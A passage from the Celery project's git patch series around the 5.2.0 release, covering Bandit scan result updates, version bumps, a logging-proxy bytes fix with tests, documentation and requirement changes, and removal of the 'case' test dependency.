+ "code": "1277 \"\"\"\n1278 assert not proc._is_alive()\n1279 self._waiting_to_start.discard(proc)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1280,
+ "line_number": 1278,
"line_range": [
- 1280
+ 1278
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "81 with allow_join_result():\n82 assert ping.delay().get(timeout=ping_task_timeout) == 'pong'\n83 \n",
+ "code": "85 with allow_join_result():\n86 assert ping.delay().get(timeout=ping_task_timeout) == 'pong'\n87 \n",
"filename": "celery/contrib/testing/worker.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 82,
+ "line_number": 86,
"line_range": [
- 82
+ 86
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "104 if perform_ping_check:\n105 assert 'celery.ping' in app.tasks\n106 # Make sure we can connect to the broker\n",
+ "code": "109 if perform_ping_check:\n110 assert 'celery.ping' in app.tasks\n111 # Make sure we can connect to the broker\n",
"filename": "celery/contrib/testing/worker.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 105,
+ "line_number": 110,
"line_range": [
- 105
+ 110
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "169 return self.win.getkey().upper()\n170 except Exception: # pylint: disable=broad-except\n171 pass\n",
+ "code": "169 return self.win.getkey().upper()\n170 except Exception: # pylint: disable=broad-except\n171 pass\n172 \n",
"filename": "celery/events/cursesmon.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Try, Except, Pass detected.",
"line_number": 170,
"line_range": [
- 170
+ 170,
+ 171
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b110_try_except_pass.html",
"test_id": "B110",
"test_name": "try_except_pass"
},
{
- "code": "481 max_groups = os.sysconf('SC_NGROUPS_MAX')\n482 except Exception: # pylint: disable=broad-except\n483 pass\n",
+ "code": "488 max_groups = os.sysconf('SC_NGROUPS_MAX')\n489 except Exception: # pylint: disable=broad-except\n490 pass\n491 try:\n",
"filename": "celery/platforms.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Try, Except, Pass detected.",
- "line_number": 482,
+ "line_number": 489,
"line_range": [
- 482
+ 489,
+ 490
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b110_try_except_pass.html",
"test_id": "B110",
@@ -2386,84 +2330,86 @@
"test_name": "assert_used"
},
{
- "code": "277 # Tasks are rarely, if ever, created at runtime - exec here is fine.\n278 exec(definition, namespace)\n279 result = namespace[name]\n",
+ "code": "332 # Tasks are rarely, if ever, created at runtime - exec here is fine.\n333 exec(definition, namespace)\n334 result = namespace[name]\n",
"filename": "celery/utils/functional.py",
"issue_confidence": "HIGH",
"issue_severity": "MEDIUM",
"issue_text": "Use of exec detected.",
- "line_number": 278,
+ "line_number": 333,
"line_range": [
- 278
+ 333
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b102_exec_used.html",
"test_id": "B102",
"test_name": "exec_used"
},
{
- "code": "15 try:\n16 import cPickle as pickle\n17 except ImportError:\n",
+ "code": "13 try:\n14 import cPickle as pickle\n15 except ImportError:\n",
"filename": "celery/utils/serialization.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Consider possible security implications associated with cPickle module.",
- "line_number": 16,
+ "line_number": 14,
"line_range": [
- 16
+ 14
],
"more_info": "https://bandit.readthedocs.io/en/latest/blacklists/blacklist_imports.html#b403-import-pickle",
"test_id": "B403",
"test_name": "blacklist"
},
{
- "code": "17 except ImportError:\n18 import pickle # noqa\n19 \n",
+ "code": "15 except ImportError:\n16 import pickle\n17 \n",
"filename": "celery/utils/serialization.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Consider possible security implications associated with pickle module.",
- "line_number": 18,
+ "line_number": 16,
"line_range": [
- 18
+ 16
],
"more_info": "https://bandit.readthedocs.io/en/latest/blacklists/blacklist_imports.html#b403-import-pickle",
"test_id": "B403",
"test_name": "blacklist"
},
{
- "code": "64 loads(dumps(superexc))\n65 except Exception: # pylint: disable=broad-except\n66 pass\n",
+ "code": "62 loads(dumps(superexc))\n63 except Exception: # pylint: disable=broad-except\n64 pass\n65 else:\n",
"filename": "celery/utils/serialization.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Try, Except, Pass detected.",
- "line_number": 65,
+ "line_number": 63,
"line_range": [
- 65
+ 63,
+ 64
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b110_try_except_pass.html",
"test_id": "B110",
"test_name": "try_except_pass"
},
{
- "code": "158 try:\n159 pickle.loads(pickle.dumps(exc))\n160 except Exception: # pylint: disable=broad-except\n",
+ "code": "156 try:\n157 pickle.loads(pickle.dumps(exc))\n158 except Exception: # pylint: disable=broad-except\n",
"filename": "celery/utils/serialization.py",
"issue_confidence": "HIGH",
"issue_severity": "MEDIUM",
"issue_text": "Pickle and modules that wrap it can be unsafe when used to deserialize untrusted data, possible security issue.",
- "line_number": 159,
+ "line_number": 157,
"line_range": [
- 159
+ 157
],
"more_info": "https://bandit.readthedocs.io/en/latest/blacklists/blacklist_calls.html#b301-pickle",
"test_id": "B301",
"test_name": "blacklist"
},
{
- "code": "159 pickle.loads(pickle.dumps(exc))\n160 except Exception: # pylint: disable=broad-except\n161 pass\n",
+ "code": "157 pickle.loads(pickle.dumps(exc))\n158 except Exception: # pylint: disable=broad-except\n159 pass\n160 else:\n",
"filename": "celery/utils/serialization.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Try, Except, Pass detected.",
- "line_number": 160,
+ "line_number": 158,
"line_range": [
- 160
+ 158,
+ 159
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b110_try_except_pass.html",
"test_id": "B110",
@@ -2498,18 +2444,32 @@
"test_name": "assert_used"
},
{
- "code": "335 self.connection.collect()\n336 except Exception: # pylint: disable=broad-except\n337 pass\n",
+ "code": "350 self.connection.collect()\n351 except Exception: # pylint: disable=broad-except\n352 pass\n353 \n",
"filename": "celery/worker/consumer/consumer.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Try, Except, Pass detected.",
- "line_number": 336,
+ "line_number": 351,
"line_range": [
- 336
+ 351,
+ 352
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b110_try_except_pass.html",
"test_id": "B110",
"test_name": "try_except_pass"
+ },
+ {
+ "code": "7 import platform\n8 import shelve\n9 import sys\n",
+ "filename": "celery/worker/state.py",
+ "issue_confidence": "HIGH",
+ "issue_severity": "LOW",
+ "issue_text": "Consider possible security implications associated with shelve module.",
+ "line_number": 8,
+ "line_range": [
+ 8
+ ],
+ "more_info": "https://bandit.readthedocs.io/en/latest/blacklists/blacklist_imports.html#b403-import-pickle",
+ "test_id": "B403",
+ "test_name": "blacklist"
}
]
-}
\ No newline at end of file
From e35205c965ac661240f8a6676a529dea2e68ea2f Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Mon, 8 Nov 2021 07:10:12 +0600
Subject: [PATCH 117/177] update changelog for 5.2.0
---
Changelog.rst | 13 +++++++++++++
1 file changed, 13 insertions(+)
diff --git a/Changelog.rst b/Changelog.rst
index d6853d97359..8c94896c0aa 100644
--- a/Changelog.rst
+++ b/Changelog.rst
@@ -8,6 +8,19 @@ This document contains change notes for bugfix & new features
in the & 5.2.x series, please see :ref:`whatsnew-5.2` for
an overview of what's new in Celery 5.2.
+.. _version-5.2.0:
+
+5.2.0
+=======
+:release-date: 2021-11-08 7.15 A.M UTC+6:00
+:release-by: Asif Saif Uddin
+
+- Prevent from subscribing to empty channels (#7040)
+- fix register_task method.
+- Fire task failure signal on final reject (#6980)
+- Limit pymongo version: <3.12.1 (#7041)
+- Bump min kombu version to 5.2.1
+
.. _version-5.2.0rc2:
5.2.0rc2
From 9c957547a77f581ad7742c2e4f5fb63643ded3e0 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Mon, 8 Nov 2021 07:13:53 +0600
Subject: [PATCH 118/177] =?UTF-8?q?Bump=20version:=205.2.0rc2=20=E2=86=92?=
=?UTF-8?q?=205.2.0?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.bumpversion.cfg | 2 +-
README.rst | 2 +-
celery/__init__.py | 2 +-
docs/includes/introduction.txt | 2 +-
4 files changed, 4 insertions(+), 4 deletions(-)
diff --git a/.bumpversion.cfg b/.bumpversion.cfg
index e30618d431d..c09541dd81c 100644
--- a/.bumpversion.cfg
+++ b/.bumpversion.cfg
@@ -1,5 +1,5 @@
[bumpversion]
-current_version = 5.2.0rc2
+current_version = 5.2.0
commit = True
tag = True
parse = (?P<major>\d+)\.(?P<minor>\d+)\.(?P<patch>\d+)(?P<releaselevel>[a-z\d]+)?
diff --git a/README.rst b/README.rst
index ca8cafaa771..350fc9dcf62 100644
--- a/README.rst
+++ b/README.rst
@@ -2,7 +2,7 @@
|build-status| |coverage| |license| |wheel| |pyversion| |pyimp| |ocbackerbadge| |ocsponsorbadge|
-:Version: 5.2.0rc2 (dawn-chorus)
+:Version: 5.2.0 (dawn-chorus)
:Web: https://docs.celeryproject.org/en/stable/index.html
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
diff --git a/celery/__init__.py b/celery/__init__.py
index 0d40be901fe..28a7de4f54b 100644
--- a/celery/__init__.py
+++ b/celery/__init__.py
@@ -17,7 +17,7 @@
SERIES = 'dawn-chorus'
-__version__ = '5.2.0rc2'
+__version__ = '5.2.0'
__author__ = 'Ask Solem'
__contact__ = 'auvipy@gmail.com'
__homepage__ = 'http://celeryproject.org'
diff --git a/docs/includes/introduction.txt b/docs/includes/introduction.txt
index 9ec52bf75db..0b871532542 100644
--- a/docs/includes/introduction.txt
+++ b/docs/includes/introduction.txt
@@ -1,4 +1,4 @@
-:Version: 5.2.0rc2 (cliffs)
+:Version: 5.2.0 (cliffs)
:Web: http://celeryproject.org/
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
From 8521e8af0ac618aff761f84b0ffe00202144271e Mon Sep 17 00:00:00 2001
From: "pre-commit-ci[bot]"
<66853113+pre-commit-ci[bot]@users.noreply.github.com>
Date: Mon, 8 Nov 2021 16:40:31 +0000
Subject: [PATCH 119/177] [pre-commit.ci] pre-commit autoupdate
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
updates:
- [github.com/pycqa/isort: 5.9.3 → 5.10.0](https://github.com/pycqa/isort/compare/5.9.3...5.10.0)
---
.pre-commit-config.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index 5897b1fd242..5c7feb69d33 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -24,6 +24,6 @@ repos:
- id: mixed-line-ending
- repo: https://github.com/pycqa/isort
- rev: 5.9.3
+ rev: 5.10.0
hooks:
- id: isort
From 3ff054e9fdff6252406c7311ca31f03bc32ebaf4 Mon Sep 17 00:00:00 2001
From: Matus Valo
Date: Mon, 8 Nov 2021 21:49:05 +0100
Subject: [PATCH 120/177] Remove unused failing unittest
---
t/distro/test_CI_reqs.py | 35 -----------------------------------
1 file changed, 35 deletions(-)
delete mode 100644 t/distro/test_CI_reqs.py
diff --git a/t/distro/test_CI_reqs.py b/t/distro/test_CI_reqs.py
deleted file mode 100644
index 861e30b905e..00000000000
--- a/t/distro/test_CI_reqs.py
+++ /dev/null
@@ -1,35 +0,0 @@
-import os
-import pprint
-
-import pytest
-
-
-def _get_extras_reqs_from(name):
- try:
- with open(os.path.join('requirements', name)) as fh:
- lines = fh.readlines()
- except OSError:
- pytest.skip('requirements dir missing, not running from dist?')
- else:
- return {
- line.split()[1] for line in lines
- if line.startswith('-r extras/')
- }
-
-
-def _get_all_extras():
- return {
- os.path.join('extras', f)
- for f in os.listdir('requirements/extras/')
- }
-
-
-def test_all_reqs_enabled_in_tests():
- ci_default = _get_extras_reqs_from('test-ci-default.txt')
- ci_base = _get_extras_reqs_from('test-ci-base.txt')
-
- defined = ci_default | ci_base
- all_extras = _get_all_extras()
- diff = all_extras - defined
- print(f'Missing CI reqs:\n{pprint.pformat(diff)}')
- assert not diff
From ff0717d7244cedd0e84162944f6bae2615a49d2d Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Tue, 9 Nov 2021 11:56:08 +0600
Subject: [PATCH 121/177] add toml file path (#7060)
---
.github/workflows/python-package.yml | 2 ++
1 file changed, 2 insertions(+)
diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml
index b4076bf6429..6807091169f 100644
--- a/.github/workflows/python-package.yml
+++ b/.github/workflows/python-package.yml
@@ -10,11 +10,13 @@ on:
- '**.py'
- '**.txt'
- '.github/workflows/python-package.yml'
+ - '**.toml'
pull_request:
branches: [ 'master', '5.0' ]
paths:
- '**.py'
- '**.txt'
+ - '**.toml'
- '.github/workflows/python-package.yml'
jobs:
From 9ff86cd5f0b32e0167c8481020c177bd72308ee5 Mon Sep 17 00:00:00 2001
From: Tim Schilling
Date: Mon, 8 Nov 2021 11:15:48 -0600
Subject: [PATCH 122/177] Fix rstrip usage on bytes instance in ProxyLogger.
It's possible for data to be a bytes instance, hence the usage of
safe_str elsewhere in the function. Before mutating the data,
it should be transformed safely into a string. Then we can replace
the new line characters.
---
celery/utils/log.py | 8 ++++----
t/unit/app/test_log.py | 25 +++++++++++++++++++++++++
2 files changed, 29 insertions(+), 4 deletions(-)
diff --git a/celery/utils/log.py b/celery/utils/log.py
index 6fca1226768..668094c5ce5 100644
--- a/celery/utils/log.py
+++ b/celery/utils/log.py
@@ -224,13 +224,13 @@ def write(self, data):
if getattr(self._thread, 'recurse_protection', False):
# Logger is logging back to this file, so stop recursing.
return 0
- data = data.rstrip('\n')
if data and not self.closed:
self._thread.recurse_protection = True
try:
- safe_data = safe_str(data)
- self.logger.log(self.loglevel, safe_data)
- return len(safe_data)
+ safe_data = safe_str(data).rstrip('\n')
+ if safe_data:
+ self.logger.log(self.loglevel, safe_data)
+ return len(safe_data)
finally:
self._thread.recurse_protection = False
return 0
diff --git a/t/unit/app/test_log.py b/t/unit/app/test_log.py
index 37ebe251f66..fea6bf6976a 100644
--- a/t/unit/app/test_log.py
+++ b/t/unit/app/test_log.py
@@ -286,6 +286,31 @@ def test_logging_proxy(self):
p.write('foo')
assert stderr.getvalue()
+ @mock.restore_logging()
+ def test_logging_proxy_bytes(self):
+ logger = self.setup_logger(loglevel=logging.ERROR, logfile=None,
+ root=False)
+
+ with mock.wrap_logger(logger) as sio:
+ p = LoggingProxy(logger, loglevel=logging.ERROR)
+ p.close()
+ p.write(b'foo')
+ assert 'foo' not in str(sio.getvalue())
+ p.closed = False
+ p.write(b'\n')
+ assert str(sio.getvalue()) == ''
+ write_res = p.write(b'foo ')
+ assert str(sio.getvalue()) == 'foo \n'
+ assert write_res == 4
+ p.flush()
+ p.close()
+ assert not p.isatty()
+
+ with mock.stdouts() as (stdout, stderr):
+ with in_sighandler():
+ p.write(b'foo')
+ assert stderr.getvalue()
+
@mock.restore_logging()
def test_logging_proxy_recurse_protection(self):
logger = self.setup_logger(loglevel=logging.ERROR, logfile=None,
From 48385bcaf544da75c110de253358ec30fedc7e4f Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?J=C3=A9r=C3=B4me=20Lafr=C3=A9choux?=
Date: Mon, 8 Nov 2021 17:57:15 +0100
Subject: [PATCH 123/177] Pass logfile to ExecStop in celery.service example
systemd file
---
docs/userguide/daemonizing.rst | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/docs/userguide/daemonizing.rst b/docs/userguide/daemonizing.rst
index cd46c4e1894..c2ea8a57645 100644
--- a/docs/userguide/daemonizing.rst
+++ b/docs/userguide/daemonizing.rst
@@ -403,7 +403,8 @@ This is an example systemd file:
--pidfile=${CELERYD_PID_FILE} --logfile=${CELERYD_LOG_FILE} \
--loglevel="${CELERYD_LOG_LEVEL}" $CELERYD_OPTS'
ExecStop=/bin/sh -c '${CELERY_BIN} multi stopwait $CELERYD_NODES \
- --pidfile=${CELERYD_PID_FILE} --loglevel="${CELERYD_LOG_LEVEL}"'
+ --pidfile=${CELERYD_PID_FILE} --logfile=${CELERYD_LOG_FILE} \
+ --loglevel="${CELERYD_LOG_LEVEL}"'
ExecReload=/bin/sh -c '${CELERY_BIN} -A $CELERY_APP multi restart $CELERYD_NODES \
--pidfile=${CELERYD_PID_FILE} --logfile=${CELERYD_LOG_FILE} \
--loglevel="${CELERYD_LOG_LEVEL}" $CELERYD_OPTS'
From 6d4a6f355e2e47d8fd798d79369f47e72e785603 Mon Sep 17 00:00:00 2001
From: Matus Valo
Date: Mon, 8 Nov 2021 21:52:33 +0100
Subject: [PATCH 124/177] Move pytest configuration from setup.cfg to
pyproject.toml
Pytest documentation does not recommend using setup.cfg as the pytest
configuration file - see warning here:
https://docs.pytest.org/en/6.2.x/customize.html#setup-cfg
---
pyproject.toml | 6 +++++-
setup.cfg | 6 ------
2 files changed, 5 insertions(+), 7 deletions(-)
diff --git a/pyproject.toml b/pyproject.toml
index 8b137891791..75ee096ea43 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -1 +1,5 @@
-
+[tool.pytest.ini_options]
+addopts = "--strict-markers"
+testpaths = "t/unit/"
+python_classes = "test_*"
+xdfail_strict=true
diff --git a/setup.cfg b/setup.cfg
index daa92865f7f..91641248bc2 100644
--- a/setup.cfg
+++ b/setup.cfg
@@ -1,9 +1,3 @@
-[tool:pytest]
-addopts = --strict-markers
-testpaths = t/unit/
-python_classes = test_*
-xfail_strict=true
-
[build_sphinx]
source-dir = docs/
build-dir = docs/_build
From 227bc0babc6389d8279254d6081448ee783feb72 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Tue, 9 Nov 2021 13:24:48 +0600
Subject: [PATCH 125/177] update readme
---
README.rst | 16 ++++++++--------
1 file changed, 8 insertions(+), 8 deletions(-)
diff --git a/README.rst b/README.rst
index 350fc9dcf62..0075875b468 100644
--- a/README.rst
+++ b/README.rst
@@ -57,13 +57,13 @@ in such a way that the client enqueues an URL to be requested by a worker.
What do I need?
===============
-Celery version 5.2.0rc2 runs on,
+Celery version 5.2.0 runs on,
- Python (3.7, 3.8, 3.9, 3.10)
-- PyPy3.7 (7.3+)
+- PyPy3.7 (7.3.7+)
-This is the next version of celery which will support Python 3.6 or newer.
+This is the version of celery which will support Python 3.7 or newer.
If you're running an older version of Python, you need to be running
an older version of Celery:
@@ -90,7 +90,7 @@ Get Started
===========
If this is the first time you're trying to use Celery, or you're
-new to Celery 5.0.5 or 5.2.0rc2 coming from previous versions then you should read our
+new to Celery v5.2.0 coming from previous versions then you should read our
getting started tutorials:
- `First steps with Celery`_
@@ -258,9 +258,9 @@ separating them by commas.
::
- $ pip install "celery[librabbitmq]"
+ $ pip install "celery[amqp]"
- $ pip install "celery[librabbitmq,redis,auth,msgpack]"
+ $ pip install "celery[amqp,redis,auth,msgpack]"
The following bundles are available:
@@ -288,8 +288,8 @@ Concurrency
Transports and Backends
~~~~~~~~~~~~~~~~~~~~~~~
-:``celery[librabbitmq]``:
- for using the librabbitmq C library.
+:``celery[amqp]``:
+ for using the RabbitMQ amqp python library.
:``celery[redis]``:
for using Redis as a message transport or as a result backend.
From 4918bfb557366931a6a1a4ff5773eb1dd197dc9c Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Wed, 10 Nov 2021 11:10:21 +0600
Subject: [PATCH 126/177] not needed as python 2 is not supported.
---
requirements/pkgutils.txt | 1 -
1 file changed, 1 deletion(-)
diff --git a/requirements/pkgutils.txt b/requirements/pkgutils.txt
index e5653449606..ea4078d78b4 100644
--- a/requirements/pkgutils.txt
+++ b/requirements/pkgutils.txt
@@ -4,7 +4,6 @@ flake8>=3.8.3
flakeplus>=1.1
flake8-docstrings~=1.5
pydocstyle~=5.0; python_version >= '3.0'
-pydocstyle~=3.0; python_version < '3.0'
tox>=3.8.4
sphinx2rst>=1.0
# Disable cyanide until it's fully updated.
From 777748038557e4d72a5d2e4e787aa6faab04ae1f Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Wed, 10 Nov 2021 11:14:05 +0600
Subject: [PATCH 127/177] drop as we don't use travis anymore
---
requirements/test-ci-base.txt | 1 -
1 file changed, 1 deletion(-)
diff --git a/requirements/test-ci-base.txt b/requirements/test-ci-base.txt
index 1fca3a107cb..3563008e5ca 100644
--- a/requirements/test-ci-base.txt
+++ b/requirements/test-ci-base.txt
@@ -1,5 +1,4 @@
pytest-cov
-pytest-travis-fold
codecov
-r extras/redis.txt
-r extras/sqlalchemy.txt
From bb11b1e289de984376650f89253ad43b7b010fec Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Wed, 10 Nov 2021 11:12:18 +0600
Subject: [PATCH 128/177] simplejson is not used anymore
---
requirements/test-integration.txt | 1 -
1 file changed, 1 deletion(-)
diff --git a/requirements/test-integration.txt b/requirements/test-integration.txt
index 1fcda0bd85c..ab2958d21ff 100644
--- a/requirements/test-integration.txt
+++ b/requirements/test-integration.txt
@@ -1,4 +1,3 @@
-simplejson
-r extras/redis.txt
-r extras/azureblockblob.txt
-r extras/auth.txt
From 011dc063719c7bce9c105a8e86095a0ccbf7cb1e Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Franti=C5=A1ek=20Zatloukal?=
Date: Wed, 10 Nov 2021 14:49:15 +0100
Subject: [PATCH 129/177] Change pytz>dev to a PEP 440 compliant pytz>0.dev.0
---
requirements/default.txt | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/requirements/default.txt b/requirements/default.txt
index c9110a53ef6..b35e5b393e9 100644
--- a/requirements/default.txt
+++ b/requirements/default.txt
@@ -1,4 +1,4 @@
-pytz>dev
+pytz>0.dev.0
billiard>=3.6.4.0,<4.0
kombu>=5.2.1,<6.0
vine>=5.0.0,<6.0
From 26d7a4fa61f6ee36ad23cc3780e09a07eb350e8c Mon Sep 17 00:00:00 2001
From: Matus Valo
Date: Thu, 11 Nov 2021 16:40:05 +0100
Subject: [PATCH 130/177] Remove dependency to case (#7077)
* Remove dependency to case
* [pre-commit.ci] auto fixes from pre-commit.com hooks
for more information, see https://pre-commit.ci
* Minor fixes
* [pre-commit.ci] auto fixes from pre-commit.com hooks
for more information, see https://pre-commit.ci
Co-authored-by: pre-commit-ci[bot] <66853113+pre-commit-ci[bot]@users.noreply.github.com>
---
celery/contrib/testing/mocks.py | 32 +-
pyproject.toml | 1 +
requirements/test.txt | 1 -
t/unit/app/test_app.py | 31 +-
t/unit/app/test_builtins.py | 2 +-
t/unit/app/test_loaders.py | 5 +-
t/unit/app/test_log.py | 56 ++--
t/unit/app/test_schedules.py | 4 +-
t/unit/backends/test_cache.py | 76 ++---
t/unit/backends/test_cassandra.py | 17 +-
t/unit/backends/test_mongodb.py | 4 +-
t/unit/backends/test_redis.py | 9 +-
t/unit/concurrency/test_prefork.py | 85 +++--
t/unit/conftest.py | 477 +++++++++++++++++++++++++++-
t/unit/contrib/test_migrate.py | 4 +-
t/unit/events/test_snapshot.py | 4 +-
t/unit/fixups/test_django.py | 42 ++-
t/unit/security/test_certificate.py | 4 +-
t/unit/security/test_security.py | 4 +-
t/unit/tasks/test_tasks.py | 2 +-
t/unit/utils/test_platforms.py | 26 +-
t/unit/utils/test_serialization.py | 11 +-
t/unit/utils/test_threads.py | 4 +-
t/unit/worker/test_autoscale.py | 10 +-
t/unit/worker/test_consumer.py | 2 +-
t/unit/worker/test_worker.py | 9 +-
26 files changed, 702 insertions(+), 220 deletions(-)
diff --git a/celery/contrib/testing/mocks.py b/celery/contrib/testing/mocks.py
index 82775011afc..a7c00d4d033 100644
--- a/celery/contrib/testing/mocks.py
+++ b/celery/contrib/testing/mocks.py
@@ -2,15 +2,11 @@
import numbers
from datetime import datetime, timedelta
from typing import Any, Mapping, Sequence
+from unittest.mock import Mock
from celery import Celery
from celery.canvas import Signature
-try:
- from case import Mock
-except ImportError:
- from unittest.mock import Mock
-
def TaskMessage(
name, # type: str
@@ -113,3 +109,29 @@ def task_message_from_sig(app, sig, utc=True, TaskMessage=TaskMessage):
utc=utc,
**sig.options
)
+
+
+class _ContextMock(Mock):
+ """Dummy class implementing __enter__ and __exit__.
+
+ The :keyword:`with` statement requires these to be implemented
+ in the class, not just the instance.
+ """
+
+ def __enter__(self):
+ return self
+
+ def __exit__(self, *exc_info):
+ pass
+
+
+def ContextMock(*args, **kwargs):
+ """Mock that mocks :keyword:`with` statement contexts."""
+ obj = _ContextMock(*args, **kwargs)
+ obj.attach_mock(_ContextMock(), '__enter__')
+ obj.attach_mock(_ContextMock(), '__exit__')
+ obj.__enter__.return_value = obj
+ # if __exit__ return a value the exception is ignored,
+ # so it must return None here.
+ obj.__exit__.return_value = None
+ return obj
diff --git a/pyproject.toml b/pyproject.toml
index 75ee096ea43..8ff14c4766b 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -3,3 +3,4 @@ addopts = "--strict-markers"
testpaths = "t/unit/"
python_classes = "test_*"
xdfail_strict=true
+markers = ["sleepdeprived_patched_module", "masked_modules", "patched_environ", "patched_module"]
diff --git a/requirements/test.txt b/requirements/test.txt
index 0dd666f70bf..90c84b1996e 100644
--- a/requirements/test.txt
+++ b/requirements/test.txt
@@ -1,4 +1,3 @@
-case>=1.3.1
pytest~=6.2
pytest-celery
pytest-subtests
diff --git a/t/unit/app/test_app.py b/t/unit/app/test_app.py
index 215e200dd45..ed61b0f8356 100644
--- a/t/unit/app/test_app.py
+++ b/t/unit/app/test_app.py
@@ -9,7 +9,6 @@
from unittest.mock import Mock, patch
import pytest
-from case import ContextMock, mock
from vine import promise
from celery import Celery, _state
@@ -18,6 +17,7 @@
from celery.app import base as _appbase
from celery.app import defaults
from celery.backends.base import Backend
+from celery.contrib.testing.mocks import ContextMock
from celery.exceptions import ImproperlyConfigured
from celery.loaders.base import unconfigured
from celery.platforms import pyimplementation
@@ -25,6 +25,7 @@
from celery.utils.objects import Bunch
from celery.utils.serialization import pickle
from celery.utils.time import localize, timezone, to_utc
+from t.unit import conftest
THIS_IS_A_KEY = 'this is a value'
@@ -915,10 +916,10 @@ def add(x, y):
assert 'add1' in self.app.conf.beat_schedule
assert 'add2' in self.app.conf.beat_schedule
- def test_pool_no_multiprocessing(self):
- with mock.mask_modules('multiprocessing.util'):
- pool = self.app.pool
- assert pool is self.app._pool
+ @pytest.mark.masked_modules('multiprocessing.util')
+ def test_pool_no_multiprocessing(self, mask_modules):
+ pool = self.app.pool
+ assert pool is self.app._pool
def test_bugreport(self):
assert self.app.bugreport()
@@ -1078,26 +1079,26 @@ def test_enable_disable_trace(self):
class test_pyimplementation:
def test_platform_python_implementation(self):
- with mock.platform_pyimp(lambda: 'Xython'):
+ with conftest.platform_pyimp(lambda: 'Xython'):
assert pyimplementation() == 'Xython'
def test_platform_jython(self):
- with mock.platform_pyimp():
- with mock.sys_platform('java 1.6.51'):
+ with conftest.platform_pyimp():
+ with conftest.sys_platform('java 1.6.51'):
assert 'Jython' in pyimplementation()
def test_platform_pypy(self):
- with mock.platform_pyimp():
- with mock.sys_platform('darwin'):
- with mock.pypy_version((1, 4, 3)):
+ with conftest.platform_pyimp():
+ with conftest.sys_platform('darwin'):
+ with conftest.pypy_version((1, 4, 3)):
assert 'PyPy' in pyimplementation()
- with mock.pypy_version((1, 4, 3, 'a4')):
+ with conftest.pypy_version((1, 4, 3, 'a4')):
assert 'PyPy' in pyimplementation()
def test_platform_fallback(self):
- with mock.platform_pyimp():
- with mock.sys_platform('darwin'):
- with mock.pypy_version():
+ with conftest.platform_pyimp():
+ with conftest.sys_platform('darwin'):
+ with conftest.pypy_version():
assert 'CPython' == pyimplementation()
diff --git a/t/unit/app/test_builtins.py b/t/unit/app/test_builtins.py
index 080999f7bc5..dcbec4b201b 100644
--- a/t/unit/app/test_builtins.py
+++ b/t/unit/app/test_builtins.py
@@ -1,10 +1,10 @@
from unittest.mock import Mock, patch
import pytest
-from case import ContextMock
from celery import chord, group
from celery.app import builtins
+from celery.contrib.testing.mocks import ContextMock
from celery.utils.functional import pass1
diff --git a/t/unit/app/test_loaders.py b/t/unit/app/test_loaders.py
index 9a411e963a4..09c8a6fe775 100644
--- a/t/unit/app/test_loaders.py
+++ b/t/unit/app/test_loaders.py
@@ -4,7 +4,6 @@
from unittest.mock import Mock, patch
import pytest
-from case import mock
from celery import loaders
from celery.exceptions import NotConfigured
@@ -120,8 +119,8 @@ def test_read_configuration_not_a_package(self, find_module):
l.read_configuration(fail_silently=False)
@patch('celery.loaders.base.find_module')
- @mock.environ('CELERY_CONFIG_MODULE', 'celeryconfig.py')
- def test_read_configuration_py_in_name(self, find_module):
+ @pytest.mark.patched_environ('CELERY_CONFIG_MODULE', 'celeryconfig.py')
+ def test_read_configuration_py_in_name(self, find_module, environ):
find_module.side_effect = NotAPackage()
l = default.Loader(app=self.app)
with pytest.raises(NotAPackage):
diff --git a/t/unit/app/test_log.py b/t/unit/app/test_log.py
